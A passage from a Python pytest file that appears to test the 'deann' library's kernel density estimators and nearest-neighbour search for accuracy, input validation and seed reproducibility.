return np.mean(np.exp(-np.sqrt(np.maximum((query**2).sum(-1)[:,None] - \
2.0*query.dot(data.T) + \
(data**2).sum(-1)[None,:],
0.0))/h),
axis=-1)
def kde_matmul_gauss(query, data, h):
return np.mean(np.exp(-np.maximum((query**2).sum(-1)[:,None] - \
2.0*query.dot(data.T) + \
(data**2).sum(-1)[None,:],
0.0)/h/h/2),
axis=-1)
def kde_matmul_loop(query, data, h):
mu = np.zeros(query.shape[0], dtype = query.dtype)
Xsq = (data**2).sum(-1)
for i in range(query.shape[0]):
q = query[i,:]
mu[i] = np.mean(np.exp(-np.sqrt(np.maximum((q**2).sum(-1) - \
2.0*data.dot(q.T) + \
Xsq,
0.0))/h))
return mu
def kde_laplacian(query, data, h):
scratch = np.zeros((query.shape[0], data.shape[0]), query.dtype)
for i in range(query.shape[0]):
q = query[i,:]
scratch[i,:] = np.linalg.norm(q[None,:] - data, ord = 1, axis = -1)
return np.mean(np.exp(-scratch/h), axis=-1)
def find_nearest_neighbor(q, X, metric):
dist = lambda x, y: \
np.linalg.norm(x-y, ord = (2 if metric == 'euclidean' else 1))
nn_idx = 0
nn_dist = dist(q,X[0,:])
for i in range(1, X.shape[0]):
x = X[i,:]
cand_dist = dist(q,x)
if cand_dist < nn_dist:
nn_idx = i
nn_dist = cand_dist
return nn_idx
def test_naive_kde1():
with pytest.raises(ValueError):
deann.NaiveKde(0.0, 'exponential')
with pytest.raises(ValueError):
deann.NaiveKde(-1.0, 'exponential')
with pytest.raises(ValueError):
deann.NaiveKde(1.0, 'eXponential')
with pytest.raises(ValueError):
deann.NaiveKde(1.0,'exponential').fit(np.ones(10))
with pytest.raises(ValueError):
deann.NaiveKde(1.0,'exponential').fit(np.ones((10,9), dtype=np.int64))
with pytest.raises(ValueError):
deann.NaiveKde(1.0,'exponential').fit(np.ones((0,9), dtype=np.float64))
with pytest.raises(ValueError):
deann.NaiveKde(1.0,'exponential').fit(np.ones((10,0), dtype=np.float32))
with pytest.raises(ValueError):
nkde = deann.NaiveKde(1.0,'exponential')
nkde.query(np.ones((2,9), dtype=np.float64))
with pytest.raises(ValueError):
nkde = deann.NaiveKde(1.0,'exponential')
nkde.fit(np.ones((10,9), dtype=np.float64))
nkde.query(np.ones((2,9), dtype=np.float32))
with pytest.raises(ValueError):
nkde = deann.NaiveKde(1.0,'exponential')
nkde.fit(np.ones((10,9), dtype=np.float32))
nkde.query(np.ones((2,9), dtype=np.float64))
with pytest.raises(ValueError):
nkde = deann.NaiveKde(1.0,'exponential')
nkde.fit(np.ones((10,9), dtype=np.float32))
nkde.query(np.ones((2,8), dtype=np.float32))
X, Y = construct_test_set()
assert X.dtype == np.float64
assert Y.dtype == np.float64
assert X.ndim == 2
assert Y.ndim == 2
assert X.shape[1] == Y.shape[1]
abs_epsilon = 1e-15
rel_epsilon = 1e-13
h = 16.0
mu = kde_matmul_exp(Y, X, h)
nkde = deann.NaiveKde(h, 'exponential')
nkde.fit(X)
Z, S = nkde.query(Y)
assert mu.dtype == np.float64
assert mu.ndim == 1
assert mu.shape[0] == Y.shape[0]
assert mu.dtype == Z.dtype
assert mu.ndim == Z.ndim
assert mu.shape[0] == Z.shape[0]
assert np.all(np.abs(Z-mu) < abs_epsilon)
assert np.all(np.abs((Z-mu)/mu) < rel_epsilon)
assert S.dtype == np.int32
assert S.ndim == 1
assert S.shape[0] == mu.shape[0]
assert np.all(S == X.shape[0])
h = 19.0
mu = kde_matmul_gauss(Y, X, h)
nkde = deann.NaiveKde(h, 'gaussian')
nkde.fit(X)
Z, S = nkde.query(Y)
assert mu.dtype == np.float64
assert mu.ndim == 1
assert mu.shape[0] == Y.shape[0]
assert mu.dtype == Z.dtype
assert mu.ndim == Z.ndim
assert mu.shape[0] == Z.shape[0]
assert np.all(np.abs(Z-mu) < abs_epsilon)
assert np.all(np.abs((Z-mu)/mu) < rel_epsilon)
assert S.dtype == np.int32
assert S.ndim == 1
assert S.shape[0] == mu.shape[0]
assert np.all(S == X.shape[0])
h = 33.0
mu = kde_laplacian(Y, X, h)
nkde = deann.NaiveKde(h, 'laplacian')
nkde.fit(X)
Z, S = nkde.query(Y)
assert mu.dtype == np.float64
assert mu.ndim == 1
assert mu.shape[0] == Y.shape[0]
assert mu.dtype == Z.dtype
assert mu.ndim == Z.ndim
assert mu.shape[0] == Z.shape[0]
assert np.all(np.abs(Z-mu) < abs_epsilon)
assert np.all(np.abs((Z-mu)/mu) < rel_epsilon)
X, Y = construct_test_set()
X = X.astype(np.float32)
Y = Y.astype(np.float32)
assert X.dtype == np.float32
assert Y.dtype == np.float32
assert X.ndim == 2
assert Y.ndim == 2
assert X.shape[1] == Y.shape[1]
abs_epsilon = 1e-06
rel_epsilon = 1e-04
h = 17.0
mu = kde_matmul_exp(Y, X, h)
nkde = deann.NaiveKde(h, 'exponential')
nkde.fit(X)
Z, S = nkde.query(Y)
assert mu.dtype == np.float32
assert mu.ndim == 1
assert mu.shape[0] == Y.shape[0]
assert mu.dtype == Z.dtype
assert mu.ndim == Z.ndim
assert mu.shape[0] == Z.shape[0]
assert np.all(np.abs(Z-mu) < abs_epsilon)
assert np.all(np.abs((Z-mu)/mu) < rel_epsilon)
assert S.dtype == np.int32
assert S.ndim == 1
assert S.shape[0] == mu.shape[0]
assert np.all(S == X.shape[0])
h = 20.0
mu = kde_matmul_gauss(Y, X, h)
nkde = deann.NaiveKde(h, 'gaussian')
nkde.fit(X)
Z, S = nkde.query(Y)
assert mu.dtype == np.float32
assert mu.ndim == 1
assert mu.shape[0] == Y.shape[0]
assert mu.dtype == Z.dtype
assert mu.ndim == Z.ndim
assert mu.shape[0] == Z.shape[0]
for i in range(mu.shape[0]):
if np.abs((Z[i]-mu[i])/mu[i]) > rel_epsilon or np.abs(Z[i]-mu[i]) > abs_epsilon:
print(mu[i], Z[i], np.abs(Z[i]-mu[i]), np.abs((Z[i]-mu[i])/mu[i]))
assert np.all(np.abs(Z-mu) < abs_epsilon)
assert np.all(np.abs((Z-mu)/mu) < rel_epsilon)
assert S.dtype == np.int32
assert S.ndim == 1
assert S.shape[0] == mu.shape[0]
assert np.all(S == X.shape[0])
h = 34.0
mu = kde_laplacian(Y, X, h)
nkde = deann.NaiveKde(h, 'laplacian')
nkde.fit(X)
Z, S = nkde.query(Y)
assert mu.dtype == np.float32
assert mu.ndim == 1
assert mu.shape[0] == Y.shape[0]
assert mu.dtype == Z.dtype
assert mu.ndim == Z.ndim
assert mu.shape[0] == Z.shape[0]
assert np.all(np.abs(Z-mu) < abs_epsilon)
assert np.all(np.abs((Z-mu)/mu) < rel_epsilon)
assert S.dtype == np.int32
assert S.ndim == 1
assert S.shape[0] == mu.shape[0]
assert np.all(S == X.shape[0])
def test_naive_kde2():
h = 35.0
for dt in [np.float32, np.float64]:
X, Y = construct_test_set()
X = X.astype(dt)
Y = Y.astype(dt)
for kernel in ['exponential', 'gaussian', 'laplacian']:
nkde = deann.NaiveKde(h,kernel)
nkde.fit(X)
mu, S0 = nkde.query(Y)
nkde.reset_seed()
Z1, S1 = nkde.query(Y)
nkde.reset_seed(0)
Z2, S2 = nkde.query(Y)
assert np.array_equal(mu,Z1)
assert np.array_equal(mu,Z2)
assert np.array_equal(S0,S1)
assert np.array_equal(S1,S2)
assert np.all(S0 == X.shape[0])
def test_random_sampling1():
with pytest.raises(ValueError):
deann.RandomSampling(0.0, 'exponential', 1)
with pytest.raises(ValueError):
deann.RandomSampling(-1.0, 'exponential', 1)
with pytest.raises(ValueError):
deann.RandomSampling(1.0, 'eXponential', 1)
with pytest.raises(ValueError):
deann.RandomSampling(1.0, 'exponential', 0)
with pytest.raises(ValueError):
deann.RandomSampling(1.0, 'exponential', -1)
with pytest.raises(ValueError):
deann.RandomSampling(1.0,'exponential',1).fit(np.ones(10))
with pytest.raises(ValueError):
deann.RandomSampling(1.0,'exponential',1).fit(np.ones((10,9), dtype=np.int64))
with pytest.raises(ValueError):
deann.RandomSampling(1.0,'exponential',1).fit(np.ones((0,9), dtype=np.float64))
with pytest.raises(ValueError):
deann.RandomSampling(1.0,'exponential',1).fit(np.ones((10,0), dtype=np.float32))
with pytest.raises(ValueError):
rs = deann.RandomSampling(1.0,'exponential',1)
rs.query(np.ones((2,9), dtype=np.float64))
with pytest.raises(ValueError):
rs = deann.RandomSampling(1.0,'exponential',1)
rs.fit(np.ones((10,9), dtype=np.float64))
rs.query(np.ones((2,9), dtype=np.int64))
with pytest.raises(ValueError):
rs = deann.RandomSampling(1.0,'exponential',1)
rs.fit(np.ones((10,9), dtype=np.float64))
rs.query(np.ones((2,9), dtype=np.float32))
with pytest.raises(ValueError):
rs = deann.RandomSampling(1.0,'exponential',1)
rs.fit(np.ones((10,9), dtype=np.float32))
rs.query(np.ones((2,9), dtype=np.float64))
with pytest.raises(ValueError):
rs = deann.RandomSampling(1.0,'exponential',1)
rs.fit(np.ones((10,9), dtype=np.float32))
rs.query(np.ones((0,9), dtype=np.float32))
with pytest.raises(ValueError):
rs = deann.RandomSampling(1.0,'exponential',1)
rs.fit(np.ones((10,9), dtype=np.float32))
rs.query(np.ones((2,0), dtype=np.float32))
with pytest.raises(ValueError):
rs = deann.RandomSampling(1.0,'exponential',1)
rs.fit(np.ones((10,9), dtype=np.float32))
rs.query(np.ones((2,8), dtype=np.float32))
ms = [1, 5, 11, 200, 600, 1400]
seed = 31415
for dt in [np.float64, np.float32]:
X, Y = construct_test_set()
X = X.astype(dt)
Y = Y.astype(dt)
h = 25.0
for kernel in ['exponential', 'gaussian', 'laplacian']:
avg_abs_error = np.zeros(len(ms))
avg_rel_error = np.zeros(len(ms))
nkde = deann.NaiveKde(h, kernel)
nkde.fit(X)
(mu, S0) = nkde.query(Y)
i = 0
for m in ms:
seed += 1
rs1 = deann.RandomSampling(h,kernel,m)
rs1.fit(X)
(Z1, S1) = rs1.query(Y)
rs2 = deann.RandomSampling(h,kernel,m)
rs2.fit(X)
(Z2, S2) = rs2.query(Y)
assert Z1.ndim == 1
assert Z2.ndim == 1
assert Z1.shape[0] == Y.shape[0]
assert Z2.shape[0] == Y.shape[0]
assert S0.ndim == 1
assert S1.ndim == 1
assert S2.ndim == 1
assert S0.shape == S1.shape
assert S0.shape == S2.shape
assert np.array_equal(S1,S1)
assert np.all(S0 == X.shape[0])
assert np.all(S1 == m)
if m > 11:
assert np.all(Z1 != Z2)
rs1 = deann.RandomSampling(h, kernel, m, seed + 1)
rs1.fit(X)
(Z1, S1) = rs1.query(Y)
rs2 = deann.RandomSampling(h, kernel, m, seed + 2)
rs2.fit(X)
(Z2, S2) = rs2.query(Y)
if m > 1:
assert np.all(Z1 != Z2)
assert S1.ndim == 1
assert S2.ndim == 1
assert S1.shape[0] == mu.shape[0]
assert S2.shape[0] == mu.shape[0]
assert np.all(S1 == m)
assert np.all(S2 == m)
rs1 = deann.RandomSampling(h, kernel, m, seed)
rs1.fit(X)
Z1, S1 = rs1.query(Y)
rs2 = deann.RandomSampling(h, kernel, m, seed)
rs2.fit(X)
Z2, S2 = rs2.query(Y)
assert np.all(Z1 == Z2)
assert S1.ndim == 1
assert S2.ndim == 1
assert S1.shape[0] == mu.shape[0]
assert S2.shape[0] == mu.shape[0]
assert np.all(S1 == m)
assert np.all(S2 == m)
Z = Z1
assert Z.ndim == 1
assert Z.shape[0] == Y.shape[0]
assert Z.dtype == dt
avg_abs_error[i] = np.mean(np.abs(Z-mu))
avg_rel_error[i] = np.mean(np.abs((Z-mu)/mu))
i += 1
for i in range(1,len(ms)):
assert avg_abs_error[i] < avg_abs_error[i-1]
assert avg_rel_error[i] < avg_rel_error[i-1]
assert avg_abs_error[-1] < 0.01
if kernel == 'exponential':
assert avg_rel_error[-1] < 0.1
else:
assert avg_rel_error[-1] < 0.2
def test_random_sampling2():
h = 36.0
seed = 527372036
for dt in [np.float32, np.float64]:
X, Y = construct_test_set()
X = X.astype(dt)
Y = Y.astype(dt)
for kernel in ['exponential', 'gaussian', 'laplacian']:
for m in [1, 11, 111, 1111]:
seed += 1
rs1 = deann.RandomSampling(h,kernel,m,seed)
rs1.fit(X)
(mu, S0) = rs1.query(Y)
assert np.all(S0 == m)
(Z1, S1) = rs1.query(Y)
assert not np.array_equal(mu,Z1)
assert np.all(S1 == m)
rs1.reset_seed(seed)
(Z2, S2) = rs1.query(Y)
assert np.array_equal(mu,Z2)
assert np.all(S2 == m)
rs2 = deann.RandomSampling(h,kernel,m,seed)
rs2.fit(X)
(Z3, S3) = rs2.query(Y)
assert np.array_equal(mu,Z3)
assert np.all(S3 == m)
rs2.reset_seed(seed)
(Z4, S4) = rs2.query(Y)
assert np.array_equal(mu,Z4)
assert np.all(S4 == m)
params = [(3,101010), (13, 121212), (131, 23232323)]
mus = list()
for (m, seed2) in params:
rs = deann.RandomSampling(h,kernel,m,seed2)
rs.fit(X)
mus.append(rs.query(Y))
rs = deann.RandomSampling(h,kernel,1)
rs.fit(X)
Z = rs.query(Y)
for i in range(len(mus)):
assert not np.array_equal(mus[i],Z)
for i in range(len(mus)):
(m, seed2) = params[i]
rs.reset_parameters(m)
rs.reset_seed(seed2)
Z = rs.query(Y)
assert np.array_equal(mus[i],Z)
def test_random_sampling_permuted():
with pytest.raises(ValueError):
deann.RandomSamplingPermuted(0.0, 'exponential', 1)
with pytest.raises(ValueError):
deann.RandomSamplingPermuted(-1.0, 'exponential', 1)
with pytest.raises(ValueError):
deann.RandomSamplingPermuted(1.0, 'eXponential', 1)
with pytest.raises(ValueError):
deann.RandomSamplingPermuted(1.0, 'laplacian', 1)
with pytest.raises(ValueError):
deann.RandomSamplingPermuted(1.0, 'exponential', 0)
with pytest.raises(ValueError):
deann.RandomSamplingPermuted(1.0, 'exponential', -1)
with pytest.raises(ValueError):
deann.RandomSamplingPermuted(1.0,'exponential',1).fit(np.ones(10))
with pytest.raises(ValueError):
deann.RandomSamplingPermuted(1.0,'exponential',1).fit(np.ones((10,9), dtype=np.int64))
with pytest.raises(ValueError):
deann.RandomSamplingPermuted(1.0,'exponential',1).fit(np.ones((0,9), dtype=np.float64))
with pytest.raises(ValueError):
deann.RandomSamplingPermuted(1.0,'exponential',1).fit(np.ones((10,0), dtype=np.float32))
with pytest.raises(ValueError):
rs = deann.RandomSamplingPermuted(1.0,'exponential',1)
rs.query(np.ones((2,9), dtype=np.float64))
with pytest.raises(ValueError):
rs = deann.RandomSamplingPermuted(1.0,'exponential',1)
rs.fit(np.ones((10,9), dtype=np.float64))
rs.query(np.ones((2,9), dtype=np.int64))
with pytest.raises(ValueError):
rs = deann.RandomSamplingPermuted(1.0,'exponential',1)
rs.fit(np.ones((10,9), dtype=np.float64))
rs.query(np.ones((2,9), dtype=np.float32))
with pytest.raises(ValueError):
rs = deann.RandomSamplingPermuted(1.0,'exponential',1)
rs.fit(np.ones((10,9), dtype=np.float32))
rs.query(np.ones((2,9), dtype=np.float64))
with pytest.raises(ValueError):
rs = deann.RandomSamplingPermuted(1.0,'exponential',1)
rs.fit(np.ones((10,9), dtype=np.float32))
rs.query(np.ones((0,9), dtype=np.float32))
with pytest.raises(ValueError):
rs = deann.RandomSamplingPermuted(1.0,'exponential',1)
rs.fit(np.ones((10,9), dtype=np.float32))
rs.query(np.ones((2,0), dtype=np.float32))
with pytest.raises(ValueError):
rs = deann.RandomSamplingPermuted(1.0,'exponential',1)
rs.fit(np.ones((10,9), dtype=np.float32))
rs.query(np.ones((2,8), dtype=np.float32))
with pytest.raises(ValueError):
rs = deann.RandomSamplingPermuted(1.0,'exponential',100)
rs.fit(np.ones((10,9), dtype=np.float32))
with pytest.raises(ValueError):
rs = deann.RandomSamplingPermuted(1.0,'exponential',1)
rs.fit(np.ones((10,9), dtype=np.float32))
rs.reset_parameters(100)
seed = 31415
for dt in [np.float64, np.float32]:
X, Y = construct_test_set()
X = X.astype(dt)
Y = Y.astype(dt)
h = 25.0
ms = [1, 103, 506, X.shape[0]]
for kernel in ['exponential', 'gaussian']:
avg_abs_error = np.zeros(len(ms))
avg_rel_error = np.zeros(len(ms))
nkde = deann.NaiveKde(h, kernel)
nkde.fit(X)
(mu, S0) = nkde.query(Y)
assert np.all(S0 == X.shape[0])
i = 0
for m in ms:
seed += 1
rsp1 = deann.RandomSamplingPermuted(h,kernel,m)
rsp1.fit(X)
(Z1, S1) = rsp1.query(Y)
rsp2 = deann.RandomSamplingPermuted(h,kernel,m)
rsp2.fit(X)
(Z2, S2) = rsp2.query(Y)
assert Z1.ndim == 1
assert Z2.ndim == 1
assert Z1.dtype == dt
assert Z2.dtype == dt
assert Z1.shape[0] == Y.shape[0]
assert Z2.shape[0] == Y.shape[0]
assert S1.ndim == 1
assert S2.ndim == 1
assert S1.dtype == np.int32
assert S2.dtype == np.int32
assert S1.shape[0] == Y.shape[0]
assert S2.shape[0] == Y.shape[0]
assert np.all(S1 == m)
assert np.all(S2 == m)
if 1 < m < X.shape[0]:
assert np.all(Z1 != Z2)
else:
assert np.any(Z1 != Z2)
rsp1 = deann.RandomSamplingPermuted(h, kernel, m, seed + 1)
rsp1.fit(X)
(Z1, S1) = rsp1.query(Y)
rsp2 = deann.RandomSamplingPermuted(h, kernel, m, seed + 2)
rsp2.fit(X)
(Z2, S2) = rsp2.query(Y)
if 1 < m < X.shape[0]:
assert np.all(Z1 != Z2)
else:
assert np.any(Z1 != Z2)
assert np.all(S1 == m)
assert np.all(S2 == m)
rsp1 = deann.RandomSamplingPermuted(h, kernel, m, seed)
rsp1.fit(X)
(Z1, S1) = rsp1.query(Y)
rsp2 = deann.RandomSamplingPermuted(h, kernel, m, seed)
rsp2.fit(X)
(Z2, S2) = rsp2.query(Y)
# these should be equal but MKL doesn't seem to
# guarantee that...
assert np.all(Z1 == Z2) or \
dt == np.float32 and np.amax(np.abs(Z1-Z2)) < 1e-6
assert np.all(S1 == m)
assert np.all(S2 == m)
rsp1 = deann.RandomSamplingPermuted(h, kernel, m, seed)
rsp1.fit(X)
(Z1, S1) = rsp1.query(Y)
rsp2 = deann.RandomSamplingPermuted(h, kernel, m, seed + 1)
rsp2.fit(X)
rsp2.reset_seed(seed)
(Z2, S2) = rsp2.query(Y)
# these should be equal but MKL doesn't seem to
# guarantee that...
assert np.all(Z1 == Z2) or \
dt == np.float32 and np.amax(np.abs(Z1-Z2)) < 1e-6
assert np.all(S1 == m)
assert np.all(S2 == m)
Z = Z1
assert Z.ndim == 1
assert Z.shape[0] == Y.shape[0]
assert Z.dtype == dt
avg_abs_error[i] = np.mean(np.abs(Z-mu))
avg_rel_error[i] = np.mean(np.abs((Z-mu)/mu))
i += 1
for i in range(1,len(ms)):
assert avg_abs_error[i] < avg_abs_error[i-1]
assert avg_rel_error[i] < avg_rel_error[i-1]
if dt == np.float64:
assert avg_abs_error[-1] < 1e-16
if dt == np.float32:
assert avg_abs_error[-1] < 1e-7
def test_brute_nn():
rng = np.random.default_rng(1234)
k = 50
for dt in [np.float64, np.float32]:
X, Y = construct_test_set()
X = X.astype(dt)
Y = Y.astype(dt)
n = X.shape[0]
m = Y.shape[0]
DELTA = 1e-12 if dt == np.float64 else 1e-05
for metric in ['euclidean', 'taxicab']:
bnn = BruteNN(metric)
bnn.fit(X)
idx = rng.integers(0,n)
q = Y[idx,:]
res = bnn.query(q,k)
assert isinstance(res,tuple)
assert len(res) == 3
(dists, nns, samples) = res
assert isinstance(dists,np.ndarray)
assert isinstance(nns,np.ndarray)
assert isinstance(samples,np.ndarray)
assert dists.ndim == 2
if metric == 'euclidean':
assert dists.dtype == dt
else:
assert dists.dtype == np.float64
assert dists.shape[0] == 1
assert dists.shape[1] == k
for i in range(1,k):
assert dists[0,i-1] < dists[0,i]
assert nns.ndim == 2
assert nns.dtype == np.int64
assert nns.shape[0] == 1
assert nns.shape[1] == k
assert np.all((nns >= 0) & (nns < n))
for i in range(k):
x = X[nns[0,i],:]
assert np.abs(np.linalg.norm(x-q, ord = (2 if metric == 'euclidean' else 1)) - dists[0,i]) < DELTA
assert samples.ndim == 1
assert samples.shape[0] == 1
assert samples.dtype == np.int32
assert samples[0] == n
bnn = BruteNN(metric, True, False)
bnn.fit(X)
res = bnn.query(q,k)
assert isinstance(res,tuple)
assert len(res) == 2
(dists2, nns2) = res
assert isinstance(dists2,np.ndarray)
assert isinstance(nns2,np.ndarray)
assert np.array_equal(dists, dists2)
assert np.array_equal(nns, nns2)
bnn = BruteNN(metric, False, True)
bnn.fit(X)
res = bnn.query(q,k)
assert isinstance(res,tuple)
assert len(res) == 2
(nns3, samples3) = res
assert isinstance(nns3,np.ndarray)
assert isinstance(samples3,np.ndarray)
assert np.array_equal(nns, nns3)
assert samples3.ndim == samples.ndim
assert samples3.dtype == samples.dtype
assert np.array_equal(samples, samples3)
bnn = BruteNN(metric, False, False)
bnn.fit(X)
res = bnn.query(q,k)
assert isinstance(res,np.ndarray)
nns4 = res
assert np.array_equal(nns, nns4)
def test_linear_scan():
with pytest.raises(ValueError):
deann.LinearScan('eclidean')
with pytest.raises(ValueError):
deann.LinearScan('euclidean').fit(np.ones(9))
with pytest.raises(ValueError):
deann.LinearScan('euclidean').fit(np.ones((10,9), dtype=np.int64))
with pytest.raises(ValueError):
deann.LinearScan('euclidean').fit(np.ones((0,9), dtype=np.float64))
with pytest.raises(ValueError):
deann.LinearScan('euclidean').fit(np.ones((10,0), dtype=np.float32))
with pytest.raises(ValueError):
ls = deann.LinearScan('euclidean')
ls.query(np.ones((2,9), dtype=np.float64), 1)
with pytest.raises(ValueError):
ls = deann.LinearScan('euclidean')
ls.fit(np.ones((10,9), dtype=np.float32))
ls.query(np.ones((2,9), dtype=np.float32), 0)
with pytest.raises(ValueError):
ls = deann.LinearScan('euclidean')
ls.fit(np.ones((10,9), dtype=np.float32))
ls.query(np.ones((2,9), dtype=np.float32), -1)
with pytest.raises(ValueError):
ls = deann.LinearScan('euclidean')
ls.fit(np.ones((10,9), dtype=np.float32))
ls.query(np.ones((2,9), dtype=np.float64), 1)
with pytest.raises(ValueError):
ls = deann.LinearScan('euclidean')
ls.fit(np.ones((10,9), dtype=np.float64))
ls.query(np.ones((2,9), dtype=np.float32), 1)
with pytest.raises(ValueError):
ls = deann.LinearScan('euclidean')
ls.fit(np.ones((10,9), dtype=np.float64))
ls.query(np.ones((0,9), dtype=np.float64), 1)
with pytest.raises(ValueError):
ls = deann.LinearScan('euclidean')
ls.fit(np.ones((10,9), dtype=np.float64))
ls.query(np.ones((2,0), dtype=np.float64), 1)
for dt in [np.float64, np.float32]:
X, Y = construct_test_set()
X = X.astype(dt)
Y = Y.astype(dt)
if dt == np.float64:
DELTA = 1e-12
else:
DELTA = 1e-3
for metric in ['euclidean', 'taxicab']:
bnn = BruteNN(metric)
bnn.fit(X)
ls = deann.LinearScan(metric)
ls.fit(X)
for k in [1, 101, X.shape[0]]:
for i in range(Y.shape[0]):
q = Y[i,:]
(dists_bnn, nn_bnn, samples_bnn) = bnn.query(q,k)
if metric == 'euclidean':
assert dists_bnn.dtype == dt
else:
assert dists_bnn.dtype == np.float64
assert dists_bnn.ndim == 2
assert dists_bnn.shape == (1,k)
assert nn_bnn.dtype == np.int64
assert nn_bnn.ndim == 2
assert nn_bnn.shape == (1,k)
assert samples_bnn.ndim == 1
assert samples_bnn.shape[0] == 1
assert samples_bnn[0] == X.shape[0]
assert samples_bnn.dtype == np.int32
(dists_ls, nn_ls, samples_ls) = ls.query(q,k)
assert nn_ls.dtype == np.int32
assert nn_ls.ndim == 2
assert nn_ls.shape == (1,k)
assert dists_ls.dtype == dt
assert dists_ls.ndim == 2
assert dists_ls.shape == (1,k)
assert samples_ls.ndim == 1
assert samples_ls.shape[0] == 1
assert samples_ls[0] == X.shape[0]
assert samples_ls.dtype == np.int32
if not np.array_equal(nn_bnn,nn_ls):
for i in range(nn_bnn.shape[1]):
if nn_bnn[0,i] != nn_ls[0,i]:
assert dt == np.float32
if metric == 'euclidean':
dist1 = np.linalg.norm(q-X[nn_bnn[0,i],:])
dist2 = np.linalg.norm(q-X[nn_ls[0,i],:])
assert np.abs(dist1-dist2) < 1e-3
else:
dist1 = np.linalg.norm(q-X[nn_bnn[0,i],:], ord=1)
dist2 = np.linalg.norm(q-X[nn_ls[0,i],:], ord=1)
assert np.abs(dist1-dist2) < 1e-3
for i in range(nn_bnn.shape[0]):
idx = nn_bnn[0,i]
x = X[idx,:]
dist = np.linalg.norm(x-q, ord = 1 if metric == 'taxicab' else 2)
assert abs(dists_bnn[0,i] - dist) < DELTA
assert idx == nn_ls[0,i]
assert abs(dists_ls[0,i] - dist) < DELTA
k = 2*X.shape[0]+1
q = Y[0,:]
with pytest.raises(ValueError):
nn_bnn = bnn.query(q,k)
with pytest.raises(ValueError):
nn_ls = ls.query(q,k)
class AnnObjectInvalid:
pass
class AnnObjectInvalidType:
def __init__(self, as_ndarray = True, as_tuple = True,
nn_type = np.int64, dist_type = np.float64):
self._as_tuple = as_tuple
self._nn_type = nn_type
self._dist_type = dist_type
self._as_ndarray = as_ndarray
def query(self, q, k):
if self._as_tuple:
return (-np.ones(k, dtype=self._dist_type),
-np.ones(k, dtype=self._nn_type))
else:
if self._as_ndarray:
return -np.ones(k, dtype = self._nn_type)
else:
return None
class AnnObject:
def __init__(self, ann = None):
self.num_of_calls = 0
self._ann = ann
def query(self, q, k):
self.num_of_calls += 1
return self._ann.query(q,k)
def test_ann_estimator1():
with pytest.raises(ValueError):
deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObjectInvalid())
with pytest.raises(ValueError):
deann.AnnEstimator(0.0, 'exponential', 0, 0, AnnObject())
with pytest.raises(ValueError):
deann.AnnEstimator(-0.0, 'exponential', 0, 0, AnnObject())
with pytest.raises(ValueError):
deann.AnnEstimator(1.0, 'eXponential', 0, 0, AnnObject())
with pytest.raises(ValueError):
deann.AnnEstimator(1.0, 'exponential', -1, 0, AnnObject())
with pytest.raises(ValueError):
deann.AnnEstimator(1.0, 'exponential', 0, -1, AnnObject())
with pytest.raises(ValueError):
deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject()).fit(np.ones(9,dtype=np.float64))
with pytest.raises(ValueError):
deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject()).fit(np.ones((10,9),dtype=np.int64))
with pytest.raises(ValueError):
deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject()).fit(np.ones((0,9),dtype=np.float32))
with pytest.raises(ValueError):
deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject()).fit(np.ones((10,0),dtype=np.float32))
with pytest.raises(ValueError):
deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject()).query(np.ones((2,9),dtype=np.float64))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject())
ann_estimator.fit(np.ones((10,9),dtype=np.float64))
ann_estimator.query(np.ones((2,9),dtype=np.int64))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject())
ann_estimator.fit(np.ones((10,9),dtype=np.float64))
ann_estimator.query(np.ones((2,9),dtype=np.float32))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject())
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
ann_estimator.query(np.ones((2,9),dtype=np.float64))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject())
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
ann_estimator.query(np.ones((2,9,1),dtype=np.float32))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject())
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
ann_estimator.query(np.ones((0,9),dtype=np.float32))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject())
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
ann_estimator.query(np.ones((2,0),dtype=np.float32))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject())
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
ann_estimator.query(np.ones(0,dtype=np.float32))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimator(1.0, 'exponential', 1, 0,
AnnObjectInvalidType(False, False))
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
ann_estimator.query(np.ones(9,dtype=np.float32))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimator(1.0, 'exponential', 1, 0,
AnnObjectInvalidType(True, False, np.float32))
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
ann_estimator.query(np.ones(9,dtype=np.float32))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimator(1.0, 'exponential', 1, 0,
AnnObjectInvalidType(True, True, np.float32))
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
ann_estimator.query(np.ones(9,dtype=np.float32))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimator(1.0, 'exponential', 1, 0,
AnnObjectInvalidType(True, True, np.int32, np.int32))
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
ann_estimator.query(np.ones(9,dtype=np.float32))
random_seed = 11992288
rng = np.random.default_rng()
NITERS = 100
DELTA64 = 1e-16
EPSILON64 = 1e-13
DELTA32 = 1e-10
EPSILON32 = 1e-5
for dt in [np.float64, np.float32]:
X, Y = construct_test_set()
X = X.astype(dt)
Y = Y.astype(dt)
h = 21.0
for kernel in ['exponential', 'gaussian', 'laplacian']:
metric = 'taxicab' if kernel == 'laplacian' else 'euclidean'
bnn = BruteNN(metric)
bnn.fit(X)
ann_estimator = deann.AnnEstimator(h, kernel, 0, 0, AnnObject())
ann_estimator.fit(X)
